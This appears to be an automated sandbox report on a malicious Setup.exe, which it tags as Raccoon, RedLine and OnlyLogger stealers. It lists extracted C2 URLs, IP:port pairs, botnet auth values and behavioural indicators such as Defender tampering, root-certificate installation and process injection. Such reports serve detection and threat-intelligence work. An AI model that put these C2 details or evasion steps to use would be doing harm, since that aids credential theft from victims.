onlylogger | 40924781ba072ea88bd7cad3f6d2a48e87f370e1c1ee334a3415dd26b5ea17e5

Target

Setup.exe
Size

1.6MB
MD5

ce6eaa52767b2df78b34519231966588
SHA1

ab32d09951189022a1a39e9204ec9ce2926b3fcf
SHA256

40924781ba072ea88bd7cad3f6d2a48e87f370e1c1ee334a3415dd26b5ea17e5
SHA512

36a09fe704823d6db5d0982d761ba1976c940b82b7c1ca650627d66e16b420612b78c761f2ed00e533453eeb2dd7e431cf47b0c2cf826354aa6e779fda531067

Score

10^/10

onlylogger raccoon redline 1c0fad6805a0f65d7b597130eb9f089ffbe9857d shafty_inst tako evasion infostealer loader spyware stealer trojan upx vmprotect

Malware Config

Extracted

Family

raccoon

Botnet

1c0fad6805a0f65d7b597130eb9f089ffbe9857d

Attributes

url4cnc
http://194.180.191.241/capibar
http://103.155.93.35/capibar
https://t.me/capibar

rc4.plain

Extracted

Family

redline

Botnet

shafty_inst

91.243.32.25:25121

Attributes

auth_value
764049059437c802ecea88e790fdca27

Extracted

Family

redline

Botnet

tako

65.108.27.131:45256

Attributes

auth_value
5e2b00f8574b1c698db50a067014ec7c

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 15 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4340-153-0x0000000000430000-0x000000000058A000-memory.dmp	family_redline
behavioral1/memory/3960-161-0x0000000000F60000-0x00000000010BC000-memory.dmp	family_redline
behavioral1/memory/3960-178-0x0000000000F62000-0x0000000000F97000-memory.dmp	family_redline
behavioral1/memory/3960-182-0x0000000000F60000-0x00000000010BC000-memory.dmp	family_redline
behavioral1/memory/3100-192-0x00000000002D0000-0x000000000042A000-memory.dmp	family_redline
behavioral1/memory/3100-195-0x00000000002D0000-0x000000000042A000-memory.dmp	family_redline
behavioral1/memory/3100-194-0x00000000002D2000-0x0000000000300000-memory.dmp	family_redline
behavioral1/memory/3960-185-0x0000000000F60000-0x00000000010BC000-memory.dmp	family_redline
behavioral1/memory/4340-184-0x0000000000432000-0x0000000000460000-memory.dmp	family_redline
behavioral1/memory/3100-175-0x00000000002D0000-0x000000000042A000-memory.dmp	family_redline
behavioral1/memory/4340-176-0x0000000000430000-0x000000000058A000-memory.dmp	family_redline
behavioral1/memory/4340-169-0x0000000000430000-0x000000000058A000-memory.dmp	family_redline
behavioral1/memory/5700-286-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/5828-295-0x0000000000D60000-0x0000000000EC1000-memory.dmp	family_redline
behavioral1/memory/5832-334-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Suspicious use of NtCreateProcessExOtherParentProcess 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeschtasks.exeWerFault.exe

description	pid	process	target process
PID 4824 created 4676	4824	WerFault.exe	hnq09WIP8wki9MFqUwtov71r.exe
PID 4764 created 1240	4764	WerFault.exe	K0RPKB0dkSPoxyfnoK66H4Ty.exe
PID 4672 created 3220	4672	WerFault.exe	gXyTOnnk3IUcq5w0DBuB4GBv.exe
PID 5088 created 4060	5088	schtasks.exe	6v2TGjpLMbRs4sA0svjAwkP8.exe
PID 5260 created 3220	5260	WerFault.exe	gXyTOnnk3IUcq5w0DBuB4GBv.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4060-248-0x0000000001AC0000-0x0000000001B04000-memory.dmp	family_onlylogger
behavioral1/memory/4060-249-0x0000000000400000-0x0000000000447000-memory.dmp	family_onlylogger

Downloads MZ/PE file

Executes dropped EXE 24 IoCs

Processes:

6v2TGjpLMbRs4sA0svjAwkP8.exeOvEog_k0rRq2vTq2yHWRuUDp.exenEvy_BKPOyBRXTvgstTFG1bb.exeC2mjL0yzJOSGevS9KddSesM3.exe4bHQMka0T42XROZkCeb73yop.exeGHd7RKSCrg_QAvmEyJHe63wk.exevIkrXkLfKUJQln1a6Gaizpmd.exe2iSKhk9uzFjJPqtrf6p6aIda.exeOAsR5ZWusgUixOoCHaIdjvFY.exehnq09WIP8wki9MFqUwtov71r.exegXyTOnnk3IUcq5w0DBuB4GBv.exezf7pB4X633NVJVpIfTclGYrB.exeIu5nlalbZipJNVQzIB6UXy51.exeConhost.exe1eecf742-1598-4f6f-94ba-2cacc2fca9b4.exeK0RPKB0dkSPoxyfnoK66H4Ty.exezyqHvLYwG6Z_hwVXCvyY7WhH.exe5gwN2rc7rJuV206DfYnLxwQ7.exe0V5XIqHYMI_CzzeaAxeeZXT_.exeInstall.exeWlRDkm0z7K7ChBDrIiHsKW3e.exeXoIfZiA0nshRAqpT3wcLc1rV.exeInstall.exe

pid	process
4060	6v2TGjpLMbRs4sA0svjAwkP8.exe
4356	OvEog_k0rRq2vTq2yHWRuUDp.exe
4576	nEvy_BKPOyBRXTvgstTFG1bb.exe
736	C2mjL0yzJOSGevS9KddSesM3.exe
4340	4bHQMka0T42XROZkCeb73yop.exe
3512	GHd7RKSCrg_QAvmEyJHe63wk.exe
4116	vIkrXkLfKUJQln1a6Gaizpmd.exe
1688	2iSKhk9uzFjJPqtrf6p6aIda.exe
3960	OAsR5ZWusgUixOoCHaIdjvFY.exe
4676	hnq09WIP8wki9MFqUwtov71r.exe
3220	gXyTOnnk3IUcq5w0DBuB4GBv.exe
2384	zf7pB4X633NVJVpIfTclGYrB.exe
3404	Iu5nlalbZipJNVQzIB6UXy51.exe
3100	Conhost.exe
4272	1eecf742-1598-4f6f-94ba-2cacc2fca9b4.exe
1240	K0RPKB0dkSPoxyfnoK66H4Ty.exe
2336	zyqHvLYwG6Z_hwVXCvyY7WhH.exe
3732	5gwN2rc7rJuV206DfYnLxwQ7.exe
4216	0V5XIqHYMI_CzzeaAxeeZXT_.exe
2284	Install.exe
4460	WlRDkm0z7K7ChBDrIiHsKW3e.exe
1352	XoIfZiA0nshRAqpT3wcLc1rV.exe
4272	1eecf742-1598-4f6f-94ba-2cacc2fca9b4.exe
5176	Install.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\??\c:\users\admin\documents\nevy_bkpoybrxtvgsttfg1bb.exe	upx
C:\Users\Admin\Documents\nEvy_BKPOyBRXTvgstTFG1bb.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Documents\Iu5nlalbZipJNVQzIB6UXy51.exe	vmprotect
C:\Users\Admin\Documents\Iu5nlalbZipJNVQzIB6UXy51.exe	vmprotect
behavioral1/memory/3404-216-0x00000000002F0000-0x0000000000B72000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

C2mjL0yzJOSGevS9KddSesM3.exeSetup.exeOvEog_k0rRq2vTq2yHWRuUDp.exe5gwN2rc7rJuV206DfYnLxwQ7.exe0V5XIqHYMI_CzzeaAxeeZXT_.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	C2mjL0yzJOSGevS9KddSesM3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	OvEog_k0rRq2vTq2yHWRuUDp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	5gwN2rc7rJuV206DfYnLxwQ7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	0V5XIqHYMI_CzzeaAxeeZXT_.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

149 ipinfo.io
164 ipinfo.io
188 ipinfo.io
9 ipinfo.io
11 ipinfo.io
148 ipinfo.io
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

4bHQMka0T42XROZkCeb73yop.exeOAsR5ZWusgUixOoCHaIdjvFY.exeConhost.exe

pid process

4340 4bHQMka0T42XROZkCeb73yop.exe
3960 OAsR5ZWusgUixOoCHaIdjvFY.exe
3100 Conhost.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

1eecf742-1598-4f6f-94ba-2cacc2fca9b4.exe

description pid process target process

PID 4272 set thread context of 1352 4272 1eecf742-1598-4f6f-94ba-2cacc2fca9b4.exe XoIfZiA0nshRAqpT3wcLc1rV.exe

flow	ioc
149	ipinfo.io
164	ipinfo.io
188	ipinfo.io
9	ipinfo.io
11	ipinfo.io
148	ipinfo.io

pid	process
4340	4bHQMka0T42XROZkCeb73yop.exe
3960	OAsR5ZWusgUixOoCHaIdjvFY.exe
3100	Conhost.exe

description	pid	process	target process
PID 4272 set thread context of 1352	4272	1eecf742-1598-4f6f-94ba-2cacc2fca9b4.exe	XoIfZiA0nshRAqpT3wcLc1rV.exe

Drops file in Program Files directory 2 IoCs

Processes:

OvEog_k0rRq2vTq2yHWRuUDp.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	OvEog_k0rRq2vTq2yHWRuUDp.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	OvEog_k0rRq2vTq2yHWRuUDp.exe

Drops file in Windows directory 9 IoCs

Processes:

svchost.exeTiWorker.exeWerFault.exe

description	ioc	process
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\WinSxS\pending.xml	TiWorker.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 21 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2732	4676	WerFault.exe	hnq09WIP8wki9MFqUwtov71r.exe
2228	3220	WerFault.exe	gXyTOnnk3IUcq5w0DBuB4GBv.exe
1836	1240	WerFault.exe	K0RPKB0dkSPoxyfnoK66H4Ty.exe
3092	4060	WerFault.exe	6v2TGjpLMbRs4sA0svjAwkP8.exe
5296	3220	WerFault.exe	gXyTOnnk3IUcq5w0DBuB4GBv.exe
5416	4676	WerFault.exe	hnq09WIP8wki9MFqUwtov71r.exe
5528	1240	WerFault.exe	K0RPKB0dkSPoxyfnoK66H4Ty.exe
5616	4060	WerFault.exe	6v2TGjpLMbRs4sA0svjAwkP8.exe
6024	4060	WerFault.exe	6v2TGjpLMbRs4sA0svjAwkP8.exe
4952	4060	WerFault.exe	6v2TGjpLMbRs4sA0svjAwkP8.exe
5560	4060	WerFault.exe	6v2TGjpLMbRs4sA0svjAwkP8.exe
4224	4060	WerFault.exe	6v2TGjpLMbRs4sA0svjAwkP8.exe
6096	4116	WerFault.exe	vIkrXkLfKUJQln1a6Gaizpmd.exe
3388	3736	WerFault.exe	NcM9Ks2UeHvkPwnXDfhuERsq.exe
2904	4060	WerFault.exe	6v2TGjpLMbRs4sA0svjAwkP8.exe
3112	3736	WerFault.exe	NcM9Ks2UeHvkPwnXDfhuERsq.exe
5724	4060	WerFault.exe	6v2TGjpLMbRs4sA0svjAwkP8.exe
1464	3736	WerFault.exe	NcM9Ks2UeHvkPwnXDfhuERsq.exe
4908	3736	WerFault.exe	NcM9Ks2UeHvkPwnXDfhuERsq.exe
1732	3736	WerFault.exe	NcM9Ks2UeHvkPwnXDfhuERsq.exe
3700	3736	WerFault.exe	NcM9Ks2UeHvkPwnXDfhuERsq.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 11 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exetaskmgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe

Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5288 schtasks.exe
4372 schtasks.exe
5416 schtasks.exe
5052 schtasks.exe
1752 schtasks.exe
2236 schtasks.exe
2668 schtasks.exe
5088 schtasks.exe

pid	process
5288	schtasks.exe
4372	schtasks.exe
5416	schtasks.exe
5052	schtasks.exe
1752	schtasks.exe
2236	schtasks.exe
2668	schtasks.exe
5088	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

6120 taskkill.exe

pid	process
6120	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Setup.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Setup.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exeSetup.exe4bHQMka0T42XROZkCeb73yop.exeOAsR5ZWusgUixOoCHaIdjvFY.exeConhost.exeIu5nlalbZipJNVQzIB6UXy51.exezyqHvLYwG6Z_hwVXCvyY7WhH.exeWerFault.exe

pid	process
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
2756	Setup.exe
2756	Setup.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
4340	4bHQMka0T42XROZkCeb73yop.exe
4340	4bHQMka0T42XROZkCeb73yop.exe
3960	OAsR5ZWusgUixOoCHaIdjvFY.exe
3960	OAsR5ZWusgUixOoCHaIdjvFY.exe
3888	taskmgr.exe
3888	taskmgr.exe
3100	Conhost.exe
3100	Conhost.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3404	Iu5nlalbZipJNVQzIB6UXy51.exe
3404	Iu5nlalbZipJNVQzIB6UXy51.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
2336	zyqHvLYwG6Z_hwVXCvyY7WhH.exe
2336	zyqHvLYwG6Z_hwVXCvyY7WhH.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
2732	WerFault.exe
2732	WerFault.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

svchost.exeTiWorker.exetaskmgr.exe

description	pid	process
Token: SeShutdownPrivilege	4884	svchost.exe
Token: SeCreatePagefilePrivilege	4884	svchost.exe
Token: SeShutdownPrivilege	4884	svchost.exe
Token: SeCreatePagefilePrivilege	4884	svchost.exe
Token: SeShutdownPrivilege	4884	svchost.exe
Token: SeCreatePagefilePrivilege	4884	svchost.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeDebugPrivilege	3888	taskmgr.exe
Token: SeSystemProfilePrivilege	3888	taskmgr.exe
Token: SeCreateGlobalPrivilege	3888	taskmgr.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe
Token: SeRestorePrivilege	3712	TiWorker.exe
Token: SeSecurityPrivilege	3712	TiWorker.exe
Token: SeBackupPrivilege	3712	TiWorker.exe

Suspicious use of FindShellTrayWindow 59 IoCs

Processes:

taskmgr.exe

pid	process
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe

Suspicious use of SendNotifyMessage 59 IoCs

Processes:

taskmgr.exe

pid	process
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe
3888	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exeWerFault.exeWerFault.exeWerFault.exezf7pB4X633NVJVpIfTclGYrB.exe

description	pid	process	target process
PID 2756 wrote to memory of 4060	2756	Setup.exe	6v2TGjpLMbRs4sA0svjAwkP8.exe
PID 2756 wrote to memory of 4060	2756	Setup.exe	6v2TGjpLMbRs4sA0svjAwkP8.exe
PID 2756 wrote to memory of 4060	2756	Setup.exe	6v2TGjpLMbRs4sA0svjAwkP8.exe
PID 2756 wrote to memory of 4356	2756	Setup.exe	OvEog_k0rRq2vTq2yHWRuUDp.exe
PID 2756 wrote to memory of 4356	2756	Setup.exe	OvEog_k0rRq2vTq2yHWRuUDp.exe
